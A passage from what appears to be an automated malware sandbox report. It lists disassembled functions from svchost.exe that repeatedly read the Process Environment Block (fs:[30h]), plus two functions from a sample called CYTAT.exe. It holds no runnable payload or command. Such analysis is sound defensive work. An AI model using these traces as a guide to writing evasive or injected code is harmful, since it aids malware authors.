            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355E53E mov eax, dword ptr fs:[00000030h]4_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035365D0 mov eax, dword ptr fs:[00000030h]4_2_035365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356A5D0 mov eax, dword ptr fs:[00000030h]4_2_0356A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356A5D0 mov eax, dword ptr fs:[00000030h]4_2_0356A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356E5CF mov eax, dword ptr fs:[00000030h]4_2_0356E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356E5CF mov eax, dword ptr fs:[00000030h]4_2_0356E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355E5E7 mov eax, dword ptr fs:[00000030h]4_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355E5E7 mov eax, dword ptr fs:[00000030h]4_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355E5E7 mov eax, dword ptr fs:[00000030h]4_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355E5E7 mov eax, dword ptr fs:[00000030h]4_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355E5E7 mov eax, dword ptr fs:[00000030h]4_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355E5E7 mov eax, dword ptr fs:[00000030h]4_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355E5E7 mov eax, dword ptr fs:[00000030h]4_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355E5E7 mov eax, dword ptr fs:[00000030h]4_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035325E0 mov eax, dword ptr fs:[00000030h]4_2_035325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356C5ED mov eax, dword ptr fs:[00000030h]4_2_0356C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356C5ED mov eax, dword ptr fs:[00000030h]4_2_0356C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356E59C mov eax, dword ptr fs:[00000030h]4_2_0356E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03532582 mov eax, dword ptr fs:[00000030h]4_2_03532582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03532582 mov ecx, dword ptr fs:[00000030h]4_2_03532582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03564588 mov eax, dword ptr fs:[00000030h]4_2_03564588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035545B1 mov eax, dword ptr fs:[00000030h]4_2_035545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035545B1 mov eax, dword ptr fs:[00000030h]4_2_035545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B05A7 mov eax, dword ptr fs:[00000030h]4_2_035B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B05A7 mov eax, dword ptr fs:[00000030h]4_2_035B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B05A7 mov eax, dword ptr fs:[00000030h]4_2_035B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352645D mov eax, dword ptr fs:[00000030h]4_2_0352645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355245A mov eax, dword ptr fs:[00000030h]4_2_0355245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356E443 mov eax, dword ptr fs:[00000030h]4_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356E443 mov eax, dword ptr fs:[00000030h]4_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356E443 mov eax, dword ptr fs:[00000030h]4_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356E443 mov eax, dword ptr fs:[00000030h]4_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356E443 mov eax, dword ptr fs:[00000030h]4_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356E443 mov eax, dword ptr fs:[00000030h]4_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356E443 mov eax, dword ptr fs:[00000030h]4_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356E443 mov eax, dword ptr fs:[00000030h]4_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355A470 mov eax, dword ptr fs:[00000030h]4_2_0355A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355A470 mov eax, dword ptr fs:[00000030h]4_2_0355A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355A470 mov eax, dword ptr fs:[00000030h]4_2_0355A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035BC460 mov ecx, dword ptr fs:[00000030h]4_2_035BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03568402 mov eax, dword ptr fs:[00000030h]4_2_03568402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03568402 mov eax, dword ptr fs:[00000030h]4_2_03568402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03568402 mov eax, dword ptr fs:[00000030h]4_2_03568402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356A430 mov eax, dword ptr fs:[00000030h]4_2_0356A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352E420 mov eax, dword ptr fs:[00000030h]4_2_0352E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352E420 mov eax, dword ptr fs:[00000030h]4_2_0352E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352E420 mov eax, dword ptr fs:[00000030h]4_2_0352E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352C427 mov eax, dword ptr fs:[00000030h]4_2_0352C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B6420 mov eax, dword ptr fs:[00000030h]4_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B6420 mov eax, dword ptr fs:[00000030h]4_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B6420 mov eax, dword ptr fs:[00000030h]4_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B6420 mov eax, dword ptr fs:[00000030h]4_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B6420 mov eax, dword ptr fs:[00000030h]4_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B6420 mov eax, dword ptr fs:[00000030h]4_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B6420 mov eax, dword ptr fs:[00000030h]4_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035304E5 mov ecx, dword ptr fs:[00000030h]4_2_035304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035644B0 mov ecx, dword ptr fs:[00000030h]4_2_035644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035BA4B0 mov eax, dword ptr fs:[00000030h]4_2_035BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035364AB mov eax, dword ptr fs:[00000030h]4_2_035364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DEB50 mov eax, dword ptr fs:[00000030h]4_2_035DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035C6B40 mov eax, dword ptr fs:[00000030h]4_2_035C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035C6B40 mov eax, dword ptr fs:[00000030h]4_2_035C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035FAB40 mov eax, dword ptr fs:[00000030h]4_2_035FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D8B42 mov eax, dword ptr fs:[00000030h]4_2_035D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352CB7E mov eax, dword ptr fs:[00000030h]4_2_0352CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AEB1D mov eax, dword ptr fs:[00000030h]4_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AEB1D mov eax, dword ptr fs:[00000030h]4_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AEB1D mov eax, dword ptr fs:[00000030h]4_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AEB1D mov eax, dword ptr fs:[00000030h]4_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AEB1D mov eax, dword ptr fs:[00000030h]4_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AEB1D mov eax, dword ptr fs:[00000030h]4_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AEB1D mov eax, dword ptr fs:[00000030h]4_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AEB1D mov eax, dword ptr fs:[00000030h]4_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AEB1D mov eax, dword ptr fs:[00000030h]4_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355EB20 mov eax, dword ptr fs:[00000030h]4_2_0355EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355EB20 mov eax, dword ptr fs:[00000030h]4_2_0355EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035F8B28 mov eax, dword ptr fs:[00000030h]4_2_035F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035F8B28 mov eax, dword ptr fs:[00000030h]4_2_035F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DEBD0 mov eax, dword ptr fs:[00000030h]4_2_035DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03550BCB mov eax, dword ptr fs:[00000030h]4_2_03550BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03550BCB mov eax, dword ptr fs:[00000030h]4_2_03550BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03550BCB mov eax, dword ptr fs:[00000030h]4_2_03550BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03530BCD mov eax, dword ptr fs:[00000030h]4_2_03530BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03530BCD mov eax, dword ptr fs:[00000030h]4_2_03530BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03530BCD mov eax, dword ptr fs:[00000030h]4_2_03530BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03538BF0 mov eax, dword ptr fs:[00000030h]4_2_03538BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03538BF0 mov eax, dword ptr fs:[00000030h]4_2_03538BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03538BF0 mov eax, dword ptr fs:[00000030h]4_2_03538BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355EBFC mov eax, dword ptr fs:[00000030h]4_2_0355EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035BCBF0 mov eax, dword ptr fs:[00000030h]4_2_035BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03540BBE mov eax, dword ptr fs:[00000030h]4_2_03540BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03540BBE mov eax, dword ptr fs:[00000030h]4_2_03540BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03536A50 mov eax, dword ptr fs:[00000030h]4_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03536A50 mov eax, dword ptr fs:[00000030h]4_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03536A50 mov eax, dword ptr fs:[00000030h]4_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03536A50 mov eax, dword ptr fs:[00000030h]4_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03536A50 mov eax, dword ptr fs:[00000030h]4_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03536A50 mov eax, dword ptr fs:[00000030h]4_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03536A50 mov eax, dword ptr fs:[00000030h]4_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03540A5B mov eax, dword ptr fs:[00000030h]4_2_03540A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03540A5B mov eax, dword ptr fs:[00000030h]4_2_03540A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035ACA72 mov eax, dword ptr fs:[00000030h]4_2_035ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035ACA72 mov eax, dword ptr fs:[00000030h]4_2_035ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356CA6F mov eax, dword ptr fs:[00000030h]4_2_0356CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356CA6F mov eax, dword ptr fs:[00000030h]4_2_0356CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356CA6F mov eax, dword ptr fs:[00000030h]4_2_0356CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DEA60 mov eax, dword ptr fs:[00000030h]4_2_035DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035BCA11 mov eax, dword ptr fs:[00000030h]4_2_035BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03554A35 mov eax, dword ptr fs:[00000030h]4_2_03554A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03554A35 mov eax, dword ptr fs:[00000030h]4_2_03554A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356CA38 mov eax, dword ptr fs:[00000030h]4_2_0356CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356CA24 mov eax, dword ptr fs:[00000030h]4_2_0356CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355EA2E mov eax, dword ptr fs:[00000030h]4_2_0355EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03530AD0 mov eax, dword ptr fs:[00000030h]4_2_03530AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03564AD0 mov eax, dword ptr fs:[00000030h]4_2_03564AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03564AD0 mov eax, dword ptr fs:[00000030h]4_2_03564AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03586ACC mov eax, dword ptr fs:[00000030h]4_2_03586ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03586ACC mov eax, dword ptr fs:[00000030h]4_2_03586ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03586ACC mov eax, dword ptr fs:[00000030h]4_2_03586ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356AAEE mov eax, dword ptr fs:[00000030h]4_2_0356AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356AAEE mov eax, dword ptr fs:[00000030h]4_2_0356AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03568A90 mov edx, dword ptr fs:[00000030h]4_2_03568A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353EA80 mov eax, dword ptr fs:[00000030h]4_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353EA80 mov eax, dword ptr fs:[00000030h]4_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353EA80 mov eax, dword ptr fs:[00000030h]4_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353EA80 mov eax, dword ptr fs:[00000030h]4_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353EA80 mov eax, dword ptr fs:[00000030h]4_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353EA80 mov eax, dword ptr fs:[00000030h]4_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353EA80 mov eax, dword ptr fs:[00000030h]4_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353EA80 mov eax, dword ptr fs:[00000030h]4_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353EA80 mov eax, dword ptr fs:[00000030h]4_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03604A80 mov eax, dword ptr fs:[00000030h]4_2_03604A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03538AA0 mov eax, dword ptr fs:[00000030h]4_2_03538AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03538AA0 mov eax, dword ptr fs:[00000030h]4_2_03538AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03586AA4 mov eax, dword ptr fs:[00000030h]4_2_03586AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B0946 mov eax, dword ptr fs:[00000030h]4_2_035B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D4978 mov eax, dword ptr fs:[00000030h]4_2_035D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D4978 mov eax, dword ptr fs:[00000030h]4_2_035D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035BC97C mov eax, dword ptr fs:[00000030h]4_2_035BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03556962 mov eax, dword ptr fs:[00000030h]4_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03556962 mov eax, dword ptr fs:[00000030h]4_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03556962 mov eax, dword ptr fs:[00000030h]4_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0357096E mov eax, dword ptr fs:[00000030h]4_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0357096E mov edx, dword ptr fs:[00000030h]4_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0357096E mov eax, dword ptr fs:[00000030h]4_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035BC912 mov eax, dword ptr fs:[00000030h]4_2_035BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03528918 mov eax, dword ptr fs:[00000030h]4_2_03528918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03528918 mov eax, dword ptr fs:[00000030h]4_2_03528918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AE908 mov eax, dword ptr fs:[00000030h]4_2_035AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AE908 mov eax, dword ptr fs:[00000030h]4_2_035AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B892A mov eax, dword ptr fs:[00000030h]4_2_035B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035C892B mov eax, dword ptr fs:[00000030h]4_2_035C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353A9D0 mov eax, dword ptr fs:[00000030h]4_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353A9D0 mov eax, dword ptr fs:[00000030h]4_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353A9D0 mov eax, dword ptr fs:[00000030h]4_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353A9D0 mov eax, dword ptr fs:[00000030h]4_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353A9D0 mov eax, dword ptr fs:[00000030h]4_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353A9D0 mov eax, dword ptr fs:[00000030h]4_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035649D0 mov eax, dword ptr fs:[00000030h]4_2_035649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035FA9D3 mov eax, dword ptr fs:[00000030h]4_2_035FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035C69C0 mov eax, dword ptr fs:[00000030h]4_2_035C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035629F9 mov eax, dword ptr fs:[00000030h]4_2_035629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035629F9 mov eax, dword ptr fs:[00000030h]4_2_035629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035BE9E0 mov eax, dword ptr fs:[00000030h]4_2_035BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B89B3 mov esi, dword ptr fs:[00000030h]4_2_035B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B89B3 mov eax, dword ptr fs:[00000030h]4_2_035B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B89B3 mov eax, dword ptr fs:[00000030h]4_2_035B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035429A0 mov eax, dword ptr fs:[00000030h]4_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035429A0 mov eax, dword ptr fs:[00000030h]4_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035429A0 mov eax, dword ptr fs:[00000030h]4_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035429A0 mov eax, dword ptr fs:[00000030h]4_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035429A0 mov eax, dword ptr fs:[00000030h]4_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035429A0 mov eax, dword ptr fs:[00000030h]4_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035429A0 mov eax, dword ptr fs:[00000030h]4_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035429A0 mov eax, dword ptr fs:[00000030h]4_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035429A0 mov eax, dword ptr fs:[00000030h]4_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035429A0 mov eax, dword ptr fs:[00000030h]4_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035429A0 mov eax, dword ptr fs:[00000030h]4_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035429A0 mov eax, dword ptr fs:[00000030h]4_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035429A0 mov eax, dword ptr fs:[00000030h]4_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035309AD mov eax, dword ptr fs:[00000030h]4_2_035309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035309AD mov eax, dword ptr fs:[00000030h]4_2_035309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03560854 mov eax, dword ptr fs:[00000030h]4_2_03560854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03534859 mov eax, dword ptr fs:[00000030h]4_2_03534859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03534859 mov eax, dword ptr fs:[00000030h]4_2_03534859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03542840 mov ecx, dword ptr fs:[00000030h]4_2_03542840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035BE872 mov eax, dword ptr fs:[00000030h]4_2_035BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035BE872 mov eax, dword ptr fs:[00000030h]4_2_035BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035C6870 mov eax, dword ptr fs:[00000030h]4_2_035C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035C6870 mov eax, dword ptr fs:[00000030h]4_2_035C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035BC810 mov eax, dword ptr fs:[00000030h]4_2_035BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03552835 mov eax, dword ptr fs:[00000030h]4_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03552835 mov eax, dword ptr fs:[00000030h]4_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03552835 mov eax, dword ptr fs:[00000030h]4_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03552835 mov ecx, dword ptr fs:[00000030h]4_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03552835 mov eax, dword ptr fs:[00000030h]4_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03552835 mov eax, dword ptr fs:[00000030h]4_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356A830 mov eax, dword ptr fs:[00000030h]4_2_0356A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D483A mov eax, dword ptr fs:[00000030h]4_2_035D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D483A mov eax, dword ptr fs:[00000030h]4_2_035D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355E8C0 mov eax, dword ptr fs:[00000030h]4_2_0355E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356C8F9 mov eax, dword ptr fs:[00000030h]4_2_0356C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356C8F9 mov eax, dword ptr fs:[00000030h]4_2_0356C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035FA8E4 mov eax, dword ptr fs:[00000030h]4_2_035FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035BC89D mov eax, dword ptr fs:[00000030h]4_2_035BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03530887 mov eax, dword ptr fs:[00000030h]4_2_03530887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352CF50 mov eax, dword ptr fs:[00000030h]4_2_0352CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352CF50 mov eax, dword ptr fs:[00000030h]4_2_0352CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352CF50 mov eax, dword ptr fs:[00000030h]4_2_0352CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352CF50 mov eax, dword ptr fs:[00000030h]4_2_0352CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352CF50 mov eax, dword ptr fs:[00000030h]4_2_0352CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352CF50 mov eax, dword ptr fs:[00000030h]4_2_0352CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356CF50 mov eax, dword ptr fs:[00000030h]4_2_0356CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03604F68 mov eax, dword ptr fs:[00000030h]4_2_03604F68
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D0F50 mov eax, dword ptr fs:[00000030h]4_2_035D0F50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B4F40 mov eax, dword ptr fs:[00000030h]4_2_035B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B4F40 mov eax, dword ptr fs:[00000030h]4_2_035B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B4F40 mov eax, dword ptr fs:[00000030h]4_2_035B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B4F40 mov eax, dword ptr fs:[00000030h]4_2_035B4F40
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
